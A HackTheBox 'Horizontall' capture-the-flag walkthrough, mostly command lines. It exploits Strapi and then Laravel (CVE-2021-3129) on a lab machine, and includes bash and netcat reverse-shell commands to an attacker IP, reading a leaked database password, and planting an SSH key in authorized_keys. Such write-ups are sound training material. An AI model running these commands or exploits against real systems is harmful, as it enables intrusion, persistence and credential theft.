HackTheBox – Horizontall Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.105
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150
http://api-prod.horizontall.htb/reviews
http://api-prod.horizontall.htb/admin
After reading the source code, I got the clue.
strapi login page, I tried basic SQL injections nothing back
further enum read blogs/cve about strapi,
, then I found the version of strapi
view-source:http://api-prod.horizontall.htb/admin/strapiVersion
“strapiVersion”:”3.0.0-beta.17.4″
https://www.exploit-db.com/exploits/50239
┌──(rootkali)-[/home/kali/Downloads]
└─# python3 50239.py http://api-prod.horizontall.htb/
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 6969
$> bash -c ‘bash -i >& /dev/tcp/10.10.14.35/6969 0>&1’
strapi@horizontall:/$ cd /opt/
strapi@horizontall:/opt$ cd strapi
strapi@horizontall:~$ cd myapi
strapi@horizontall:~/myapi$ cd config
strapi@horizontall:~/myapi/config$ cd environments
strapi@horizontall:~/myapi/config/environments$ cd development
strapi@horizontall:~/myapi/config/environments/development$ cat database.json
“username”: “developer”,
“password”: “#J!:F9Zt2u”
strapi@horizontall:~/myapi/config/environments/development$ netstat -tulpn | grep LISTEN
When I was scrolling down, suddenly I noticed the open ports on the local machine. Port 3306 is for MySql connection, port 1337 is for API calls, but port 8000 was strange. I ran a curl command to see what was going on there.
strapi@horizontall:~/myapi/config/environments/development$ curl http://localhost:8000
strapi@horizontall:~/myapi/config/environments/development$ cd ~
strapi@horizontall:~$ cd .ssh
strapi@horizontall:~/.ssh$ ls –lrt
strapi@horizontall:~/.ssh$ cat authorized_keys
strapi@horizontall:~/.ssh$ echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYi25AmGCouopUL+dykKSA/DJUUZTNq8B0QJuwItrj5TrSKIF3Tkc8w3nSOaBz2JVqP22wvNX/Ca4IIY51gZEFIYm6k9HxezWJwOQq4x1VV/wH0sXLIm6P/MW8DuZM0XvgN+a8w7Cfgo5e659xdVtNvUSFazIM+Fb/SMYp9N8TwxQtPTshuXAup1H2HB7Knb3rJT0CKFKIg8s36Hy4m7GyCr0En7Fjl/n9JfoxUZvaA2LA5CurR/UD75nD021XX9xYobnPby0AveP0HF8ZFD2xxqKxzH5Zc25u2D6BYXHSTiofFiYDkHiLDIPeQgA/PdiTc4TrL5x8H7xxbYA8j106yFVxd7UhTow8fBzCvgCMJN5uCNj+Deo4LgFJjrYArwrMnK3Y69nF0emSOXBU8ZJXRQNUkebIEwpBPTNUwcYnUMeT3wNyGtjbK2GjhRipOyOHUgVqePZep1/njBx6YKQr7A30zPOnQHt05vuLGxwDKm0UiWFOBifKYtGqHBqES6c= root@kali” > authorized_keys
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i key -L 8000:127.0.0.1:8000 strapi@horizontall.htb
It was easy to notice that on port 8000 a Laravel v8 framework was working. I did a quick search about Laravel v8 framework.
https://github.com/nth347/CVE-2021-3129_exploit
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/nth347/CVE-2021-3129_exploit.git
┌──(rootkali)-[/home/kali/Downloads]
└─# cd CVE-2021-3129_exploit
It was easy to notice that on port 8000 a Laravel v8 framework was working. I did a quick search about Laravel v8 framework.
https://github.com/nth347/CVE-2021-3129_exploit
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/nth347/CVE-2021-3129_exploit.git
┌──(rootkali)-[/home/kali/Downloads]
└─# cd CVE-2021-3129_exploit
┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 “cat /root/root.txt”
┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 “nc 10.10.14.35 6666| /bin/bash 2>&1 | nc 10.10.14.35 6667”